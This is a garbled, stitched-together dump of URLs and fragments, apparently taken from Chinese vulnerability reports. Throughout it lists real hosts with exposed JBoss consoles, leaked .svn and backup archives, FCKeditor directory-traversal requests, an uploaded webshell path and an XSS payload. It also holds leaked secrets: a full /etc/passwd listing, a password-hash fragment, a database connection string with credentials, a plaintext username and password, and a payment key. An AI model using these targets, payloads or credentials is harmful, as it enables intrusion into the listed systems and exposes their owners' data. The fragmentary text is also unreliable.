https://counter.yongjinbao.com.cn/ajaxUserLogin\!ajaxUserLogin.action http://t.96335.com/ http://116.10.197.141:8081/shop/index.php http://t.96335.com/circle/index.php?act=cut&op=pic_cut http://t.96335.com/circle/index.php?act=cut&op=pic_cut http://www.lib.swjtu.edu.cn/Default.aspx http://222.36.3.60/ttweb/index.jsp http://222.41.213.236/invoker/JMXInvokerServlet http://www.utourworld.com/findpwd/ http://www.utourworld.com/usercenter/LoginUser.aspx http://www.utourworld.com/usercenter/AddCommonVisitor.aspx?Id=194440&keepThis=true&TB_iframe=true&height=230&width=550 http://www.utourworld.com/usercenter/AddCommonVisitor.aspx?Id=194439&keepThis=true&TB_iframe=true&height=230&width=550 
http://www.utourworld.com/usercenter/AddCommonVisitor.aspx?Id=194438&keepThis=true&TB_iframe=true&height=230&width=550 http://doogua.dangdang.com/book/search/ post:class=&text=1&type=all root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin checkos:x:500:500::/home/checkos:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin mysql:x:502:502::/var/lib/mysql:/bin/bash zabbix:x:503:503::/home/zabbix:/bin/bash memcached:x:101:103:Memcached daemon:/var/run/memcached:/sbin/nologin http://my.0-6.com/admin/app/vote/index.do http://my.0-6.com/admin/ http://l.airchina.com.cn在线学习平台,点击忘记密码,会提示:“用户名为国航10位员工编号; 
http://hdjw.hnu.cn/p.rar http://hdjw.hnu.cn/xscj/Stu_MyScore.aspx http://shopm.qztelecom.com/loginAction!login.action http://passport2.chaoxing.com/login http://222.73.244.122/ http://222.73.244.122/jmx-console/ http://222.73.244.122/jmx-console/或 http://222.73.244.122/invoker/JMXInvokerServlet http://www.chnmuseum.cn/tabid/462/Default.aspx http://wooyun.org/bugs/wooyun-2010-028562之前有报过,,, http://www.imeach.com/giftList.php?catid=18&only=&order=&score=&sort= position:absolute;width:100%;height:300%;background-color vertical-align:top http://www.baidu.com/ http://localhost/csrf.php http://my.0-6.com:80/admin/App/Vote/save.do http://www.jxvw.com/ http://www.leyou.com.cn/bbs https://mail.leyou.com.cn/owa/ http://www.3need.com/index.php?controller=site&action=payok&out_trade_no=充值订单号 http://www.3need.com/index.php?controller=site&action=payok&out_trade_no=3need1429095660 http://**.**.**/ME/Login.aspxtype=1 http://222.33.193.178/ http://218.90.162.66:8015/ProductShow.asp?ID=201 http://219.146.62.244:8088/ http://www.bioknow.net/portal/root/website_bioknow/index.jsp http://www.bionovo.com.cn/portal/root/gcp_project_bionovo/gyxt.jsp?id=22577155 http://202.38.77.223:8000/portal/root/lims_std/gyxt.jsp?id=232783874 http://218.75.123.195:8181/portal/root/lcky1/gyxt.jsp?id=12713988 http://www.gzboji-edc.com/portal/root/eip_cro/gyxt.jsp?id=9240576 http://202.197.66.228/portal/root/data_analysis/gyxt.jsp?id=262146 http://222.68.193.118 http://222.68.193.118/mana/edit/uploadattcah.jsp(可直接上传jsp) http://222.68.193.118/mana/edit/attach_upload.jsp(可直接上传jsp) http://www.mynj.gov.cn/jmx-console/问题已经修复 http://221.226.11.85/ http://221.226.11.85/invoker/JMXInvokerServlet http://www.xpshop.cn http://enframe.xpshop.cn/ http://125.88.10.165/WebAttend/sys/login.aspx http://yuyue.mama.cn http://202.106.152.92:8080/asop/logout.asop?userId=38,每次生成的userid是不同的。点了退出之后抓包获取userid: http://58.215.139.37:9200/_status http://58.215.139.37:9200/_nodes http://58.215.139.37:9200/_cluster/health 
http://bbs.51idc.com/ http://www.51idc.com/.svn/entries http://www.infowarelab.com/ http://www.olo.cn/http://www.olo.cn/jmx-console/ http://114.251.242.128 http://zhaopin.sme.gov.cn/ www.scjg.com.cn http://**.**.**/zlqc_index/index.jsp_ http://**.**.**/jmx-console/_ http://**.**.**/invoker/JMXInvokerServlet_ http://www.jstc.gov.cn/Page/System/NewsAllList.aspx?KeyWord=11 http://www.yingjiesheng.com/ http://demo.ourphp.net/?cn-job-7.html,其中的cn-job-7.html会被解析成cn、job、7三个参数,这里的cn参数存在注入漏洞,而整个ourphp的网站几乎都是这种类型的url。 http://demo.ourphp.net/?cn-job-7.html http://demo.ourphp.net/?cn-shop.html http://119.7.200.19:8080/OAapp/WebObjects/OAapp.woa http://git.wcf.srnpr.com/scm/svn/svnmall/ofbiz/applications/core/config/mail.properties http://localhost:8080 http://k.cn//.svn/entries http://k.cn/editor/upload.html http://k.cn/attachment/editor/20150415103423_2145.php http://124.115.170.169/searchweb/search.jsp http://124.115.170.169/cssweb http://124.115.170.169/searchweb/template/basic/images/s2.jsp http://124.115.170.169/searchweb/template不变 https://mail.tcl.com/ http://ekp.haierre.com/login/Login.jsp?logintype=1&message= http://ekp.haierre.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://desktop.it.meiyou.com http://220.179.122.101/ http://220.179.122.101//jmx-console/ http://www.70.com/.svn/entries http://219.143.248.244/index.do http://219.143.248.244/invoker/JMXInvokerServlet http://www.dyfdc.net.cn/PubInfo/AreaAnalysis.asp?Qrylx=gymj&Qryszqx= http://www.yafcj.com/PubInfo/AreaAnalysis.asp?Qrylx=gymj&Qryszqx= http://www.szfcsc.com/web/pubinfo/Analysis_Area.asp?Qryszqx= http://221.234.43.179:7202/PubInfo/AreaAnalysis.asp?Qryszqx= http://www.wtxfcj.com/pubinfo/AreaAnalysis.asp?Qryszqx= http://www.hsfdc.com/web/pubinfo/Analysis_Area.asp?Qryszqx= http://www.bsfcba.com/setting/xgmm_dowith.asp http://www.szfcsc.com:81/setting/xgmm_dowith.asp http://www.bsfctd.com/setting/xgmm_dowith.asp http://www.bsfcll.com/setting/xgmm_dowith.asp 
http://www.bsfclly.com/setting/xgmm_dowith.asp http://www.bsfcxl.com/setting/xgmm_dowith.asp http://www.bsfctl.com/setting/xgmm_dowith.asp http://www.bsfcjx.com/setting/xgmm_dowith.asp http://www.bsfcpg.com/setting/xgmm_dowith.asp http://monitor.101.com/ http://oa.yunzao.cn/oa.upload.tar.gz http://www.itrust.org.cn/)敏感信息泄露,服务器早期曾经被人留下后门。可直接进入dede管理后台,dede后台可以直获取webshell的。 http://**.**.** http://www.zxhsd.com/search/book_search.jsp?keyword=1 http://www.zxhsd.com/group/search_article.jsp?keyword=123 http://www.zxhsd.com/ttc/ttcDetail.jsp?spbs=2438853 http://www.zxhsd.com/ttc/ttcList.jsp?lb=JQA&lbmc=%C9%FA%CF%CA%B9%FB%CA%DF http://www.zxhsd.com/Club/Register_check.jsp?dlm=hello http://www.zxhsd.com/group/zxly.jsp?currpg=1&keyword=123 http://b2g.zxhsd.com/servlet/fwdAjax?qwdg=0&dz_county=1&lx=1 http://zxhsd.com/images/ad/ http://zhoushan.zxhsd.com/images/ http://yuhang.zxhsd.com/images/ http://xiaoshan.zxhsd.com/images/ http://xianju.zxhsd.com/images/ http://www.263.net/263/onlineTopUp/ http://paycenter.263.net/pay/payway_payGetWay.action?serviceUserCode=263qytxvboss&key=5c59aaa1e2532fdf2db725e80e1fa742&productCode=vbossP&payMoney=0.01&orderId=1000055070&buyer=test@domain.com&ejd=994c63e1d017331ebb0a81ca51cbcd93 xxx.kuwo.cn/g/st/PersonalCenter?act= http://sxd.kuwo.cn/g/st/PersonalCenter?act=%22;alert%28%275%27%29%3C/script%3E http://ts.kuwo.cn/test.php http://jx.swufe.edu.cn/sc8/page/schoolspace/academy.do http://111.12.219.18/Login.aspx) http://wooyun.org/bugs/wooyun-2015-098718 http://221.2.154.142:8080/index.php http://220.231.55.63/index.do http://220.231.55.63/index.do http://zhixingche.me/user/index http://211.69.144.70/ http://211.69.144.70/login.aspx?sysId=2 www.lefu8.com http://220.189.240.216/ctkj_acl/html/login.html inurl://///?/youku./@password www.xa-police.gov.cn/_ www.xa-police.gov.cn/www.zip http://czj.daqing.gov.cn/Admin_Login.asp http://czj.daqing.gov.cn/bszn.asp?classid=8 http://czj.daqing.gov.cn/bszn.asp?classid=8 
http://czj.daqing.gov.cn/bszn.asp?classid=8 http://115.29.3.122:8080/ http://www.1337day.com/exploit/23480 http://www.lntu.edu.cn/hisphoto.asp?id=18 http://chl.yinxunpay.com/login.action http://zhixingche.me/site/search-post?type=0&keyword=%22 http://cg.chaoxing.com/set_password.aspx http://elearning1.zte.com.cn/DistanceLearning/Application/CourseCenter/CourseBasicInfo.aspx?FromSource=20&CourseNo=55522&ApprovalFlag=&RedictToOtherCourse=false http://elearning1.zte.com.cn/DistanceLearning/Application/CourseCenter/CourseBasicInfo.aspx?FromSource=20&CourseNo=55522&ApprovalFlag=&RedictToOtherCourse=false http://221.0.180.142 http://221.0.180.142/jmx-console/ http://221.0.180.142/invoker/JMXInvokerServlet http://www.tax361.com:7001/law/GetChannelList.jsp?id=700000000002 http://bbs.caissa.com.cn/?330000 http://bbs.caissa.com.cn/?335000 http://202.102.221.85/toLoginPage.do?reurl=http%253A%252F%252F202.102.221.85%252FtoIndexPage.do zmsn.jjh.k618.cn/index.php?r=post/search&tit= zmsn.jjh.k618.cn/index.php?r=post/search&tit= https://account.meilishuo.com https://218.94.123.58/portal_default/vone/portal/index.html http://www.cqitc.cn/ http://ipc.cqitc.cn/PcPrj/pcPrj_list.action http://cc.cqitc.cn/VcPrj/vcPrj_list.action http://cp.cqitc.cn/Business/Index.action http://nis.cqitc.cn/Business/query/LoginQuery.action http://nis.cqitc.cn/Business/query/LoginQuery.action http://sps.sysu.edu.cn/admin/login.aspx http://zhixingche.me/post/208 http://www.hsfjqqcz.com/page/login!login.action http://220.163.114.112/ynsiq/ http://220.163.114.112/jmx-console http://220.163.114.112/invoker/JMXInvokerServlet http://www.wlmqwb.com/ http://w.wlmqwb.com//about/about.html http://cms.wlmqwb.com/vote/00/1.htm http://cms.wlmqwb.com/vote/00/file/help1.aspx http://wap-ebank.pingan.com/weixin/modules/register/index.html?from=login https://wap-ebank.pingan.com//xinyongka/public.do?operationType=getPwdKey http://wap-ebank.pingan.com//weixin/js_lib/tools/unionrsa.js cn:9090 
http://im.tebon.com.cn:9090/uploadfile?istrade=istrade&filename=../WEB-INF/web.xml http://im.tebon.com.cn:9090/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://220.248.78.86:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://220.248.78.86:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../upload http://220.248.78.86:9090/uploadfile?istrade=istrade&filename=../upload/testucstar.jspx http://221.232.130.116/login.do http://www.jhun.edu.cn/ncontent.asp?id=111931&am http://219.132.155.50/ http://219.132.155.50/invoker/JMXInvokerServlet http://116.112.14.74:8080/KX_SSH_JZNY/login!showLogin.action http://58.61.160.40/ http://portal.51iwifi.com/site/portal/?dev_id=RADIUS-RADIUS-20150204-63ee0d57 http://27.223.70.96:8080/admin/backendUi!login.do http://oa.yunzao.cn/admin/user-info-edit http://drops.wooyun.org/tips/2031。 http://zhixingche.me/ http://zhixingche.me/post/375 http://oa.chinagas.com.cn/new/new.rar http://oa.chinagas.com.cn/new/add_fapiao.aspx找到fck编辑器 http://www.hb139.com.cn http://www.hb139.com.cn/aopp/org/login.do http://www.whmzj.gov.cn/shzz/mfml.aspx?page=0&property=1 http://www.sregc.com.cn/news-list.php?type=gsnews&oid=333 http://service.shmetro.com/zxjl/index.htm http://**.**.**/admin.php http://218.60.144.109/ http://218.60.144.109/invoker/JMXInvokerServlet http://**.**.**/login.jsp http://bbs.3gsc.com.cn//.svn/entries an:3316 http://adm.suning.com/server-status http://card.suning.com/server-status http://cg.suning.com/server-status http://cloud.suning.com/server-status http://list.suning.com/server-status http://lms.suning.com/server-status http://msg.suning.com/server-status http://product.suning.com/server-status http://search.suning.com/server-status http://shop.m.suning.com/server-status http://yp.suning.com/server-status 
http://**.**.**/cy/cy.detail.phppid=99838 inurl:////?/zt.4399/@UserName/@password www.zip http://www.cs-travel.com/vote/vote.php?prjid=3 http://ahaq.hrss.gov.cn/news_show.asp?id=4349 http://ahaq.hrss.gov.cn/manage/login.asp http://ahaq.hrss.gov.cn/news_show.asp?id=4349 http://ahaq.hrss.gov.cn/news_show.asp?id=4349 http://www.vipstudy.com.cn/ http://www.vipstudy.com.cn/www.vipstudy.com.cn.zip http://www.vipstudy.com.cn/phpcms/libs/nwxs.php http://libao.1006.tv http://www.chnphoto.cn//.svn/entries http://photo.chnphoto.cn//.svn/entries http://www.chnphoto.cn/test.php http://photo.chnphoto.cn/phpinfo.php http://libao.1006.tv/codedetail/282/1 http://www.vhall.com/action.php?module=mywebinar.saveimage http://www.vhall.com/action.php?module=mywebinar.saveimage http://www.vhall.com/action.php?module=mywebinar.saveimage http://tg.9you.com/ http://www.cqmetro.cn/wwwroot_release/crtweb/yyfw/ckwd/index.shtml www.1006.tv/然后拉到下面看到有妹纸 www.1006.tv/news/218399 http://csair.95516.com http://d.shiwan.com http://d.shiwan.com/streams/pptv/sphinx.html http://www.wooyun.org/bugs/wooyun-2015-0108194/trace/9fdbb3f803e5683ac9a460f49c702d93 http://www.newvane.com.cn/index.php?ac=article&at=list&tid=151 http://121.8.153.10 http://218.1.73.18 http://exam.kingdee.com http://222.68.193.118 http://user.shiwan.com/myMsgWithOne?page=1&uid_with=1 http://101.226.164.193/loginIn.action http://imed.hbcf.edu.cn http://bbs.shiwan.com/subject/115515 http://bbs.shiwan.com/subject/188910 http://bbs.shiwan.com/subject/115515 http://www.strongsoft.net/DMenu.aspx http://www.zhuoyue.sdu.edu.cn/ http://1.202.195.218/xxnm/ http://www.zjgrc.com/userControls/webPic/pic_click_count.aspx?advertRegion_cd=zjg_AD11 http://manager.ranknowcn.com/ http://211.138.29.206:8080/login.jsp http://www.xmgd.com/webepg/webepg.jsp?id=437653228 http://3c.ecare365.com/newtc2/ordered.aspx http://211.99.228.163:8080/invoker/JMXInvokerServlett http://58.68.225.208/ http://219.141.214.6/ http://219.141.214.6/admin-console 
http://116.114.83.134/ http://mobile.coinvs.com/ProjectView/detailEx/pid/1114 http://mobile.coinvs.com/ProjectView/detailEx/pid/1114 http://baike.baidu.com/link?url=JT9Fdhe5EHCQyau_8IOv7vlwZ5mA4XjSfT8_UiMzoE4Zj8Pgo-sTsjh7Msej0ly40N6GClrhg6m-2uzkUfpYQa url:http://www.zsmz.com http://www.zsmz.com/memberJson/sendMobileCode username:athena2010 password:3df00baa82e3266d MD5:520xccmlp http://www.hndk.hunan.gov.cn/ http://**.**.** http://218.24.167.26/fromLogin/fromLoginSave.jsp http://218.24.167.26/fromLogin/manageLogin.jsp?usertype=3 http://www.luhui.net/Product.asp?Sort_ID=3 http://www.wushang.com/member/messagedetail.jsp?msgid=msg_1660000 http://oms.fruitday.com/ https://mail.euchost.com/owa/auth/logon.aspx http://219.153.9.73:8080/submitted/login.action http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://www.shiwan.com/app/531280 http://yunshangdian.com/ http://srm.tclking.com www.job1001.com//myNew/down.php?filename=../inc/indexCache/trade/index.php http://zhihui.189hz.com/login_login.action http://zhihui.189hz.com/ma3.jsp http://zhihui.189hz.com/pic/.svn/entries http://zhihui.189hz.com/pic/2012/.svn/entries http://zhihui.189hz.com/content/.svn/entries http://zhihui.189hz.com/web/.svn/entries http://bbs.shiwan.com http://xb2.hbcf.edu.cn/law/plus/recommend.php存在注入,可直接获取管理账号密码 http://my.gfan.com/info.php URL:http://my.gfan.com/account http://bbs.shiwan.com/subject/188803 display:none http://61.130.72.149:8001/zkweb/ http://61.130.72.149:8001/zkweb/zkLogin_kl.do http://www.1006.tv/center/blzz http://**.**.**/gjfpb/ http://124.115.170.79:9080/pis/ http://www.egova.com.cn/ http://success.xcmg.com/detail.jsp?myid=121 major:73指计算机类(其他的可以在大街网看出来) livicity:510100 http://211.167.226.120/index.jsp http://211.167.226.120/jmx-console/ http://dingdan.fday.co/ http://dingdan.fday.xyz/】 http://noviciate.people258.com/News/BulletinList.aspx?newsType=27 http://noviciate.people258.com/News/NewsList.aspx?newsType=26 
http://search.people258.com/SearchResult.aspx?AreaNamesContent=%E5%98%89%E5%85%B4&area=3304 http://search.people258.com/SearchResult.aspx?KeyType=3&AreaNamesContent=%E9%80%89%E6%8B%A9%2F%E4%BF%AE%E6%94%B9&KeyWord=%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90&area= http://search.people258.com/SearchResult.aspx?Release=-1&keyType=3&keyword=%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90 http://manager.people258.com/auth.rar http://www.sms.com.cn/Blog/index.php?cl=53 http://211.157.16.118/ http://211.157.16.118/jmx-console/ http://210.14.78.250/api/gettruckorders.aspx?date=2014-12-08 http://210.14.78.250/Api/Delivery/Waves.aspx?day=2014-11-28 http://192.168.10.205:8088/third/getSdBatchs?day=2014-11-28 http://210.14.78.250/Api/Delivery/GetWaveById.aspx?id=2702 http://192.168.10.205:8088/third/getBachById?id=115 http://210.14.78.250/Api/Delivery/WaveOrders.aspx?banci=3243 http://192.168.10.205:8088/third/getOrderDvByBid?waveid=115 http://210.14.78.250/Api/Delivery/GetOrderByWaveId.aspx?waveid=3243 http://192.168.10.205:8088/third/singleRow?waveid=70 http://210.14.78.250/api/GetByBarCode.aspx?type=boci&barcode=00007-141129 http://192.168.10.205:8088/wms/getOdBycodes?type=boci&barcode=1000030882 http://210.14.78.250/api/OrderSearch.aspx?truck=20141128-sh-5-006&waveid=3243 http://210.14.78.250/Api/gettruckorders.aspx?codes=00007-141129 http://210.14.78.250/api/gettruckorders.aspx?date=2014-12-08 http://218.6.160.236:8081/mhcj/login.action http://mall.sh.189.cn/mall/tao-number.html http://www.syst.com.cn/cn/download.aspx?id=407 http://www.syst.com.cn/cn/magazine.aspx?id=136 http://www.syst.com.cn/cn/magazine_info.aspx?id=791 http://www.syst.com.cn/cn/quality.aspx?parentid=133 http://www.syst.com.cn/Editor/eWebeditor/admin/login.aspx http://111.39.218.85/Admin/admin_login.asp http://218.94.36.160:81 http://180.153.139.84:11381/ydccp/login.jsp http://wms.fday.co/ http://wms.fday.xyz/ http://wms.fruitday.com http://wms.fday.co/order/pack/progress?batch_id=5970 
http://122.144.167.54:38080/wms/getDeliveryOrders?deliver_method=10&warehouse=sh&day=2015-01-11 http://122.144.167.54:38080/wms/getDeliveryOrders?deliver_method=10&warehouse=sh&day=2015-01-10 http://122.144.167.54:38080/wms/getDeliveryOrders?waveid=150110002_sh_DSF_SF_ZB http://122.144.167.54:38080/wms/getDeliveryOrders?orders=1000388815,1000388886 http://122.144.167.54:38080/third/syncExpCode http://cang.fday.co/ http://joshell.coding.io/joshell mysql://qzgIlkpXmNtrwYW3:EZvyGidCWMg***@10.9.1.***:3306/cf_082c8f00_9f4f_481a_b6f8_***?reconnect=true","jdbcUrl":"jdbc:mysql://10.9.1.***:3306/cf_082c8f00_9f4f_481a_b6f8_***?user=qzgIlkpXmNtrwYW3&password=EZvyGidCWMg***"}}],"redis-2.6":[*******],"filesystem-1.0":[{"name":"commy-file","label":"filesystem-1.0","tags":["filesystem","filesystem-1.0","Persistent http://home.fruitday.com/ http://fday.co/ http://home.fruitday.com http://wms.fruitday.com http://fenche.fruitday.com http://oms.fruitday.com http://home.fday.co http://dingdan.fday.co http://home.fday.co http://wms.fday.co http://fenche.fday.co http://wms.fday.co http://dingdan.fday.co http://wms.fday.co http://cang.fday.co http://cang.fday.co http://omstst.fruitday.com http://wms.fday.xyz http://home.fday.xyz http://fenche.fday.xyz http://dingdan.fday.xyz http://cang.fday.xyz http://oms.fruitday.com/ http://omstst.fruitday.com http://oms.fruitday.com http://home.fday.co http://home.fday.xyz http://wms.fday.co http://211.157.16.118/ http://211.157.16.118/scripts/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://202.108.124.146/login.asp http://202.108.124.146 http://gg.yy.com/admin/html/userOrder.html http://dev2.user.anzhi.com:9201/ http://www.jygb.cq.cn http://my.wust.edu.cn/ http://my.wust.edu.cn:8081/jdsgy/dede/index.php http://my.wust.edu.cn:8081/jdsgy/uploads/1.php http://dsp.cig.com.cn http://www.zjtax.gov.cn/ids/admin/notifycation/list.jsp 
http://www.zjtax.gov.cn/ids/admin/user/list.jsp http://www.zjtax.gov.cn/ids/admin/sys/system/editSysParaCfg.jsp http://210.38.57.70:8180/eWebEditor_V5.0/admin/login.jsp http://gs.scu.edu.cn/web.rar http://gs.scu.edu.cn/manage/tab/ewebeditor/admin/login.aspx?action=login http://60.30.66.197/ums/ http://218.246.22.61/index_search.aspx?ShowTitle=1 http://222.240.192.140/bbs/ http://222.240.192.140/bbs/Manage/default.asp http://www.cppsu.edu.cn/jiaxiao/ruler_view.cfm?id=40 http://www.cppsu.edu.cn/jiaxiao/ruler_view.cfm?id=40 http://sqlmap.org http://203.195.204.80/admin-console http://passport.cocoachina.com/sso/forget_pass http://222.240.192.140/xt/DataBase/DB.mdb http://222.240.192.140/xt/login.asp http://114.113.149.161:8081/sso/ssologin!ssojs.action http://www.chinacreator.com/ http://hnnjtg.net/comm_front/yqlj/addLinks_do.jsp?siteid= http://www.hncks.com/comm_front/yqlj/addLinks_do.jsp?siteid= http://fz.hnagri.gov.cn/comm_front/yqlj/addLinks_do.jsp?siteid= http://www.hnnyzz.com/comm_front/yqlj/addLinks_do.jsp?siteid= http://www.hnagri.gov.cn/comm_front/yqlj/addLinks_do.jsp?siteid= http://lebi.17500.cn/experts/results/index/mtype/schs/eid/2514* http://www.ver.cn/news/news_detail.php?col_id=3234 http://nczx.yonyou.com/SubModule/role/ http://hw.gpsisp.com/gps/doif/myLogin.jsp http://www.appstar.com.cn/appstar/manage/upload/ads/1429335160287.jsp www.tjbtn.net的信息收集 http://221.129.243.165:8080/login.do http://www.anmai.net:81/login.aspx http://ps.imau.edu.cn/anmai/login.aspx http://gyxx.cmjy.sh.cn/anmai/login.aspx http://www.jukui.com/ANMAI/login.aspx http://www.tlxlhzx.com/ANMAI/login.aspx http://www.whir.net/index.html http://oa.tlchem.com.cn:7001/ http://oa.elyl.com.cn:7001// http://61.132.136.122:8080/ http://218.92.72.69:7001/ http://219.139.191.200/ http://bbs.qjvpn.com.cn/admin.php http://mszj.jingjiang.gov.cn:8888/jjmszj/admin/fileUpload-downloadTAnnex.action http://www.whjdsc.com http://www.strongsoft.net/ http://ldfxb.com/ http://61.153.79.222:3050/ 
http://www.jnfxb.com/ http://122.228.162.250:3050/ http://syq.cxwater.cn/ http://www.17ugo.com/user.php?act=get_password http://bb.hitwh.edu.cn:90/news_index.jsp?id=3 http://bb.hitwh.edu.cn:90/wap/classroom_search2.jsp http://bb.hitwh.edu.cn:90/wap/showclass.jsp http://bb.hitwh.edu.cn:90/news_index.jsp?id=3 http://sqlmap.org http://www.itophome.com//technique.aspx?sea=1&v=VkO1HZa5 http://dev.open.youzu.com http://dev.open.youzu.com/site/reg http://dev.open.youzu.com/email/send/type/1/cId/62e50c508258e9618f9298b568f29acc/act/1 http://dev.open.youzu.com/email/activation/u/邮箱/type/1/cId/返回的字符串/act/1/t/时间戳 http://dev.open.youzu.com/email/activation/u/test%40wooyun.org/type/1/cId/62e50c508258e9618f9298b568f29acc/act/1/t/1429353880 http://dev.open.youzu.com/findPwd/resetPwd/u/邮箱/type/1/cId/返回的字符串/act/1/t/时间戳 http://www.wzbtv.com/pic/Newsview.asp?id=38 http://dlx.lenovo.com/dlx3/rcmweb/default.aspx http://dlx.lenovo.com http://dlx.lenovo.com/dlx3/TSR.Web.OutSide/UI/NewStorefront/addSalePlace.aspx?p=32165&level=-1 http://59.175.146.55:81/OAapp/WebObjects/OAapp.woa http://www.makita.com.cn/product_show.php?id=23 http://www.makita.com.cn/product_show.php?id=23 http://www.makita.com.cn/product_show.php?id=23 http://www.makita.com.cn/product_show.php?id=-23 http://www.pinker365.com/reg.html http://www.gxntjz.com:8088/ http://183.203.150.20:8000/ http://service.ltpop.gov.cn/ http://service.zzxpop.gov.cn/ http://service.zyxpop.gov.cn/ http://service.akpop.gov.cn/ http://service.hsrk.gov.cn/ http://service.ltjsj.gov.cn/ http://service.ltpop.gov.cn/Services/MarriageLicenceDo/0fb09558794bd94e/0301/610122104206.shtml http://service.ltpop.gov.cn/Services/MarriageLicenceDo/0fb09558794bd94e/0301/610122105206.shtml inurl:http://www.zhaomu.com/Manage/ http://gm.ns.youzu.com/data/ http://gm.ns.youzu.com/html http://www.10jqka.com.cn/ia/index.php~ http://www.10jqka.com.cn/ia/mod.php~ http://www.10jqka.com.cn/modules.php~ http://www.10jqka.com.cn/modules/toplist/get_js.php~ 
http://www.10jqka.com.cn/modules/trade/get_user_trade_info.php~ http://www.10jqka.com.cn/kid_mammon/config.inc http://www.jushanghui.com/ http://www.bjbb.com/index.shtml http://**.**.**/vmain/login.jsp www.ztesoft.com:808 www.ztesoft.com:808/index.php?ac=form&at=list&fgid=2&jn=%E5%B8%82%E5%9C%BA%E9%A1%B9%E7%9B%AE%E7%AD%96%E5%88%92%E7%BB%8F%E7%90%86%E3%80%80 http://222.180.173.73/index.aspx http://www.999netsafe.com/ http://wap.ltjsj.gov.cn/ http://wap.hsrk.gov.cn/ http://wap.zyxpop.gov.cn/ http://wap.zzxpop.gov.cn/ http://wap.ltpop.gov.cn/ http://wap.ltjsj.gov.cn/ServicesDo.aspx?c=0301&v=610115001001 http://wap.hsrk.gov.cn/ServicesDo.aspx?c=0303&v=610823102204 http://www.zznyxxxt.gov.cn:6001/FQSSYSWEB/ http://www.zznyxxxt.gov.cn:6001/FQSSYSWEB/UserControl/ImgUpload/ImgUpload.jsp http://61.154.9.6:8119/manage/user-manage!client_loginOut.action http://www.tlsp.net/FCKeditor/editor/filemanager/connectors/jsp/upload.jsp?Type=File http://61.139.105.105:8008/IMLoginServlet?uid=1&pwd=1 http://61.139.105.105:8008/persionTreeServlet?bmdm=1 http://61.139.105.105:8008 http://124.128.96.98:8001 http://www.jmsxc.com:7001 http://210.44.112.101 http://210.41.128.120:8002 http://web72283.5udns.cn http://bjunicom.weibiz.cn/Handler/Activity_Charge.ashx http://www.scjb.gov.cn:11212/invoker/JMXInvokerServlet http://www.baidu.com/s?wd=site%3A%3Cscript%3Ea%3D%2F*bbbbbbbbbbbb*%2Falert%281%29%2F%2F http://shjsb.gov.cn/invoker/JMXInvokerServlet http://www.5150w.cn/ http://lengku.5150w.cn/ https://github.com/puppyred/lvmama_pet/blob/master/Super_back/src/config/edm_config.properties edu.189.cn/eip-platform-sso-server/login.jsp http://s.edu.189.cn/sns/t/bk_Edit.aspx?LeId=2352 http://tieba.baidu.com/godthread/likePost http://**.**.**/findPassword.action http://nubia.cn/demo.jsp http://nubia.cn/index2.jsp http://top.vcooline.com:8183/redmine/issues web.sh.ptt.189.cn/company/login.do http://m.ilvxing.com/usercenter/user/login(google浏览器,其他浏览器不兼容。。。。。。。) www.ilvxing.com 
http://zone.suning.com/review/json/product_reviews/000000000126148820--total-g-810999---3-4-getItem.html?callback=getItem http://image.suning.cn/uimg/cmf/cust_headpic/0000000000_01_60x60.jpg http://my.tantuls.com/jsp/init.action http://119.60.5.20/invoker/JMXInvokerServlet http://fenche.fday.xyz http://222.174.163.3:10066/ http://222.174.163.3:10066/存在jboss命令执行漏洞 http://222.174.163.3:10066/myname/index1.jsp APhBZznXIxLQlioi8GsMn1:15604:0:99999:7 http://www.gdmo.cn/weather-gdmo/weathervideo/weather-video!init.action http://117.27.156.8:8000/ http://117.27.156.8:8000/myname/index.jsp http://wooyun.org/bugs/wooyun-2010-091951 http://221.232.147.74:81/ http://eqxiu.com http://www.suning.com.cn/suning.zip http://www.smecq.gov.cn/ http://www.smecq.gov.cn/news/currentnews/CurrentNewsCon.aspx?content_id=74663 http://cqncp.smecq.com/web/?page=content&cid=1099 http://218.70.15.10:1666/jmx-console/ www.glzfgjj.cn:8136 https://www.wacai.com/user/um_saveUserInfo.action 